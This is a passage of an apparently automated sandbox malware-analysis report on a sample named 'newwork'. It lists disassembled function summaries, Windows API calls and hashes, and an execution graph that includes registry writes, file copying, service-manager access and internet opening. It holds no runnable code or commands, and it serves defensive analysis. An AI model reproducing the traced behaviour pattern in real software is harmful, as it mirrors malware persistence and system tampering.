                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                        • String ID: <
                                                                                        • API String ID: 893404051-4251816714
                                                                                        • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                        • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                        • String ID: )
                                                                                        • API String ID: 2227675388-1084416617
                                                                                        • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                        • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                        • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                        • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window
                                                                                        • String ID: /INITPROCWND=$%x $@
                                                                                        • API String ID: 2353593579-4169826103
                                                                                        • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                        • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                        APIs
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocByteCharFreeMultiWide
                                                                                        • String ID: NIL Interface Exception$Unknown Method
                                                                                        • API String ID: 3952431833-1023667238
                                                                                        • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                        • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                        • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                          • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorHandleLastProcess
                                                                                        • String ID: 0nI
                                                                                        • API String ID: 3798668922-794067871
                                                                                        • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                        • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$EnumQuery
                                                                                        • String ID: Inno Setup: No Icons
                                                                                        • API String ID: 1576479698-2016326496
                                                                                        • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                        • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 1799206407-488339322
                                                                                        • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                        • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 2018770650-488339322
                                                                                        • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                        • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                        APIs
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                        • String ID: T$H
                                                                                        • API String ID: 377330604-488339322
                                                                                        • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                        • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                        APIs
                                                                                          • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                                          • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                          • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                        • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                        • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                        Strings
                                                                                        • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                        • String ID: Detected restart. Removing temporary directory.
                                                                                        • API String ID: 1717587489-3199836293
                                                                                        • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                        • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                        • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                        • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: `6\
                                                                                        • API String ID: 2123368496-1549246104
                                                                                        • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                        • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                        • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                        • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                        • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.4%
                                                                                        Dynamic/Decrypted Code Coverage:83.9%
                                                                                        Signature Coverage:6.7%
                                                                                        Total number of Nodes:958
                                                                                        Total number of Limit Nodes:32
                                                                                        execution_graph 60354 402a20 GetVersion 60378 403b64 HeapCreate 60354->60378 60356 402a7f 60357 402a84 60356->60357 60358 402a8c 60356->60358 60453 402b3b 8 API calls 60357->60453 60390 403844 60358->60390 60362 402a94 GetCommandLineA 60404 403712 60362->60404 60366 402aae 60436 40340c 60366->60436 60368 402ab3 60369 402ab8 GetStartupInfoA 60368->60369 60449 4033b4 60369->60449 60371 402aca GetModuleHandleA 60373 402aee 60371->60373 60454 40315b GetCurrentProcess TerminateProcess ExitProcess 60373->60454 60375 402af7 60455 403230 UnhandledExceptionFilter 60375->60455 60377 402b08 60379 403b84 60378->60379 60380 403bba 60378->60380 60456 403a1c 19 API calls 60379->60456 60380->60356 60382 403b89 60383 403ba0 60382->60383 60384 403b93 60382->60384 60386 403bbd 60383->60386 60458 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 60383->60458 60457 403f3b HeapAlloc 60384->60457 60386->60356 60387 403b9d 60387->60386 60389 403bae HeapDestroy 60387->60389 60389->60380 60459 402b5f 60390->60459 60393 403863 GetStartupInfoA 60396 4038af 60393->60396 60397 403974 60393->60397 60396->60397 60401 402b5f 12 API calls 60396->60401 60403 403920 60396->60403 60398 4039db SetHandleCount 60397->60398 60399 40399b GetStdHandle 60397->60399 60398->60362 60399->60397 60400 4039a9 GetFileType 60399->60400 60400->60397 60401->60396 60402 403942 GetFileType 60402->60403 60403->60397 60403->60402 60405 403760 60404->60405 60406 40372d GetEnvironmentStringsW 60404->60406 60407 403735 60405->60407 60408 403751 60405->60408 60406->60407 60409 403741 GetEnvironmentStrings 60406->60409 60411 403779 WideCharToMultiByte 60407->60411 60412 40376d GetEnvironmentStringsW 60407->60412 60410 402aa4 60408->60410 60413 4037f3 GetEnvironmentStrings 60408->60413 60414 4037ff 60408->60414 60409->60408 60409->60410 60427 4034c5 60410->60427 60416 4037ad 60411->60416 60417 4037df FreeEnvironmentStringsW 60411->60417 60412->60410 60412->60411 60413->60410 60413->60414 60418 402b5f 12 API calls 60414->60418 60419 402b5f 12 API calls 60416->60419 60417->60410 60420 40381a 60418->60420 60421 4037b3 60419->60421 60423 403830 FreeEnvironmentStringsA 60420->60423 60421->60417 60422 4037bc WideCharToMultiByte 60421->60422 60424 4037d6 60422->60424 60425 4037cd 60422->60425 60423->60410 60424->60417 60468 402c11 60425->60468 60428 4034d7 60427->60428 60429 4034dc GetModuleFileNameA 60427->60429 60481 405d24 19 API calls 60428->60481 60431 4034ff 60429->60431 60432 402b5f 12 API calls 60431->60432 60433 403520 60432->60433 60435 403530 60433->60435 60482 402b16 7 API calls 60433->60482 60435->60366 60437 403419 60436->60437 60439 40341e 60436->60439 60483 405d24 19 API calls 60437->60483 60440 402b5f 12 API calls 60439->60440 60441 40344b 60440->60441 60447 40345f 60441->60447 60484 402b16 7 API calls 60441->60484 60443 402c11 7 API calls 60444 4034ae 60443->60444 60444->60368 60445 402b5f 12 API calls 60445->60447 60446 4034a2 60446->60443 60447->60445 60447->60446 60485 402b16 7 API calls 60447->60485 60450 4033bd 60449->60450 60452 4033c2 60449->60452 60486 405d24 19 API calls 60450->60486 60452->60371 60454->60375 60455->60377 60456->60382 60457->60387 60458->60387 60463 402b71 60459->60463 60462 402b16 7 API calls 60462->60393 60464 402b6e 60463->60464 60466 402b78 60463->60466 60464->60393 60464->60462 60466->60464 60467 402b9d 12 API calls 60466->60467 60467->60466 60469 402c1d 60468->60469 60477 402c39 60468->60477 60471 402c27 60469->60471 60472 402c3d 60469->60472 60470 402c68 60473 402c69 HeapFree 60470->60473 60471->60473 60474 402c33 60471->60474 60472->60470 60476 402c57 60472->60476 60473->60477 60479 403fae VirtualFree VirtualFree HeapFree 60474->60479 60480 404a3f VirtualFree HeapFree VirtualFree 60476->60480 60477->60424 60479->60477 60480->60477 60481->60429 60482->60435 60483->60439 60484->60447 60485->60447 60486->60452 60487 40d4e0 60488 40d4ff Sleep 60487->60488 60489 b74616 60490 b87646 InternetOpenA 60489->60490 60492 401662 60493 4020e2 RegSetValueExA 60492->60493 60495 40d0d0 60493->60495 60495->60495 60284 402204 VirtualAlloc 60285 40d7e5 60284->60285 60496 402067 RegCreateKeyExA 60497 401c12 60496->60497 60286 401c0c RegCloseKey 60287 401c12 60286->60287 60288 401b4d 60292 401897 60288->60292 60293 401e4e 60294 401e51 60293->60294 60296 401dd0 60293->60296 60295 401e56 LoadLibraryExA 60294->60295 60294->60296 60295->60296 60296->60296 60498 b05e5e RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 60499 b05ecb GetTickCount 60498->60499 60536 b042c7 60498->60536 60537 b059fa 60499->60537 60502 b05ee8 GetVersionExA 60503 b05f29 __cftof2_l 60502->60503 60504 b11fbc _malloc 59 API calls 60503->60504 60505 b05f36 60504->60505 60506 b11fbc _malloc 59 API calls 60505->60506 60507 b05f46 60506->60507 60508 b11fbc _malloc 59 API calls 60507->60508 60509 b05f51 60508->60509 60510 b11fbc _malloc 59 API calls 60509->60510 60511 b05f5c 60510->60511 60512 b11fbc _malloc 59 API calls 60511->60512 60513 b05f67 60512->60513 60514 b11fbc _malloc 59 API calls 60513->60514 60515 b05f72 60514->60515 60516 b11fbc _malloc 59 API calls 60515->60516 60517 b05f7d 60516->60517 60518 b11fbc _malloc 59 API calls 60517->60518 60519 b05f89 6 API calls 60518->60519 60520 b05fd6 __cftof2_l 60519->60520 60521 b05fef RtlEnterCriticalSection RtlLeaveCriticalSection 60520->60521 60522 b11fbc _malloc 59 API calls 60521->60522 60523 b0602b 60522->60523 60524 b11fbc _malloc 59 API calls 60523->60524 60525 b06039 60524->60525 60526 b11fbc _malloc 59 API calls 60525->60526 60527 b06040 60526->60527 60528 b11fbc _malloc 59 API calls 60527->60528 60529 b06061 QueryPerformanceCounter Sleep 60528->60529 60530 b11fbc _malloc 59 API calls 60529->60530 60531 b06087 60530->60531 60532 b11fbc _malloc 59 API calls 60531->60532 60535 b06097 __cftof2_l 60532->60535 60533 b0610a RtlEnterCriticalSection RtlLeaveCriticalSection 60533->60535 60534 b06104 Sleep 60534->60533 60535->60533 60535->60534 60538 b11fbc _malloc 59 API calls 60537->60538 60539 b05a0d 60538->60539 60297 40228f 60298 40dd06 60297->60298 60300 401301 FindResourceA 60298->60300 60301 401367 SizeofResource 60300->60301 60306 401360 60300->60306 60302 401386 LoadResource LockResource GlobalAlloc 60301->60302 60301->60306 60303 4013cc 60302->60303 60304 40141f GetTickCount 60303->60304 60307 40142a GlobalAlloc 60304->60307 60306->60298 60307->60306 60540 401b6f RegOpenKeyExA 60541 401dbe 60540->60541 60308 40d950 60309 40d955 OpenSCManagerA 60308->60309 60310 4021ed 60309->60310 60310->60309 60311 40e09b 60310->60311 60542 40d674 60543 40d605 CopyFileA 60542->60543 60544 40d613 60543->60544 60545 4019aa 60543->60545 60544->60542 60546 4018b6 60547 40230f lstrcmpiW 60546->60547 60548 401717 60547->60548 60549 40d7cd lstrcmpiW 60548->60549 60550 40d87f 60549->60550 60312 b0e8a7 CreateFileA 60313 b0e9a3 60312->60313 60317 b0e8d8 60312->60317 60314 b0e8f0 DeviceIoControl 60314->60317 60315 b0e999 CloseHandle 60315->60313 60316 b0e965 GetLastError 60316->60315 60316->60317 60317->60314 60317->60315 60317->60316 60319 b127c5 60317->60319 60322 b127cd 60319->60322 60321 b127e7 60321->60317 60322->60321 60324 b127eb std::exception::exception 60322->60324 60327 b11fbc 60322->60327 60344 b16e73 RtlDecodePointer 60322->60344 60345 b131ca RaiseException 60324->60345 60326 b12815 60328 b12037 60327->60328 60336 b11fc8 60327->60336 60352 b16e73 RtlDecodePointer 60328->60352 60330 b1203d 60353 b14acb 59 API calls __getptd_noexit 60330->60353 60333 b11ffb 